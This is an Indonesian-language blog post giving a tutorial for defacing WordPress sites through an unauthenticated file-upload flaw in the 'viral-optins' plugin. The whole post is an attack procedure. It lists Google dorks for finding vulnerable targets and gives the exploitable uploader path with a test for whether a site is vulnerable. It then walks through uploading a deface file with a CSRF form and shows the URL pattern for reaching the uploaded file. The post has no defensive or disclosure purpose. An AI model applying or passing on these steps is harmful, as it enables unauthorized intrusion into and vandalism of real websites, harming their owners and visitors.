cara deface poc viral_option v2

apa kabar mas ato mbak? baik? ok terimakasih..
kali ini khoirulrisqi.com akan memberikan tutorial deface teknik viral_option v2

langsung aja to the point, nyimak gan :(

dork:
inurl:/wp-content/plugins/viral-optins/
inurl:/wp-content/plugins/viral-optins intext:"Parent Director"
inurl:/wp-content/plugins/viral-optins intext:"api"
(kembangkan gan)

masukan exploitnya.
exploit:  /wp-content/plugins/viral-optins/api/uploader/file-uploader.php
contoh: site.co.li/wp-content/plugins/viral-optins/api/uploader/file-uploader.php

vuln? blank, kalo blank berati vuln temen temen.

masukan ke csrf gan, csrf disini gan :(

contoh menggunakan csrf lihat gambar dibawah ini teman teman.

 klik create.

upload file depesmu ext .txt

cara akses? http://site.co.li/wp-content/uploads/tahun/bulan/file.txt
contoh: site.co.li/wp-content/uploads/2018/03/fck.txt









0 Komentar untuk "cara deface poc viral_option v2"

Back To Top